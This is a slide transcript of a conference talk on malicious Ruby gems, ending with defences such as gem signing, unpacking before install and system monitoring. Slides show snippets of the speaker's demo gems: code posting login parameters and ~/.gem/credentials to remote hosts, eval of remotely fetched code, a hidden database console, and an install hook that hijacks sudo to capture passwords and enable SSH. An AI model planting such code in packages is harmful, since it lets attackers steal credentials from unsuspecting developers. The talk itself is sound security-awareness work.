Hacking with Gems (denver.rb)

Transcript

1. Hacking with Gems Benjamin Smith @benjamin_smith

2. How to punk your friends with gems Benjamin Smith @benjamin_smith

3. How-to get rich quick and (maybe) not go to jail!

   Benjamin Smith @benjamin_smith

4. Four reasons you should NOT trust Benjamin Smith @benjamin_smith

5. None

6. who i am

7. who i am

8. who i am

9. what i am NOT

10. None

11. please do not try this at home

12. please do not try this at home

13. None
14. None

15. Lawful Evil Lawful Good

16. Lawful Evil Lawful Good

17. Lawful Evil Lawful Good

18. Lawful Evil Lawful Good

19. once upon a time

20. GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview

    (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

21. what’s the worst that could happen?

22. None

23. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

24. before... github.com/benjaminleesmith/awesome-rails-flash-messages

25. after! github.com/benjaminleesmith/awesome-rails-flash-messages

26. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

27. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

28. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

29. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

30. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

31. “development.log” ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

32. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

33. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

34. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

38. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

39. a one way ticket to

40. that was easy. what else can I do?

41. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

42. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

45. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

46. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

50. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

51. /users/sign_in github.com/benjaminleesmith/net_http_detector

52. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

53. hello db access! github.com/benjaminleesmith/net_http_detector

54. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

55. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

56. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

57. careful of wolves in sheep’s clothing

58. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

59. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

63. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

64. i like the beach

65. that was easy. what else can I do?

66. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

67. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
68. None

69. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

70. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

71. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

72. what what github.com/benjaminleesmith/better_date_to_s

73. i can haz source github.com/benjaminleesmith/better_date_to_s

74. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

75. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

76. that was easy hard. what else can I do? (that's

    easier)

77. gem install bunlder

78. gem install be_truthy github.com/benjaminleesmith/be_truthy

79. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

80. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

81. github.com/benjaminleesmith/be_truthy

82. file tree looks ok github.com/benjaminleesmith/be_truthy

83. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

84. but what was this? github.com/benjaminleesmith/be_truthy

85. I see no C github.com/benjaminleesmith/be_truthy

86. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

87. there is no Rakefile github.com/benjaminleesmith/be_truthy

88. the real file tree github.com/benjaminleesmith/be_truthy

89. the real file tree github.com/benjaminleesmith/be_truthy

90. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

91. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

92. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

93. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

94. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

97. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

98. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

99. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

100. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

     -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

101. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

102. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

103. take away: don't install ben's gems

104. None

105. how could I get you to install my gems?

106. what gems are trustworthy?

107. how can I add my code to already trusted gems?

108. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

     ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

     Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

110. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

     Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

111. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

     Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

112. now I own your gems github.com/benjaminleesmith/be_truthy

113. > git clone your-gem-repo ...add a little code... > rake

     build > gem push your-gem github.com/benjaminleesmith/be_truthy

114. do people trust your gems?

115. do people who install your gems have trustworthy gems?

116. None

117. there’s still one problem

118. bootstrapping

119. being popular sucks

120. conferences

121. social engineering

122. None
123. None
124. None

125. so what happens now?

126. ruby gems goes down

127. heroku deploys go down

128. i go to the beach

129. ruby gems goes down

130. heroku deploys go down

131. recovery

132. so what now?

133. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

134. Little Snitch obdev.at/products/littlesnitch/index.html

135. gem install be_truthy github.com/benjaminleesmith/be_truthy

136. fseventer fernlightning.com/doku.php?id=software:fseventer:start

137. don’t “gem install” from strangers

138. gem fetch vs gem install > gem fetch be_truthy >

     gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
139. None
140. None

141. curl -sSL https://get.rvm.io | bash

142. gem install rails -P HighSecurity

143. > gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:

     While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

144. gem cert --build

145. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

146. sandboxing

147. github.com/rubygems/rubygems

148. tools to detect malicious code

149. private gem repos

150. do not try this at home

151. don't install gems you don't need to

152. pay attention to what your gems do

153. monitor your system

154. read the source

155. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

156. on install github.com/benjaminleesmith/coal-mine-canary

157. the results github.com/benjaminleesmith/coal-mine-canary

158. thank you!

159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

160. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith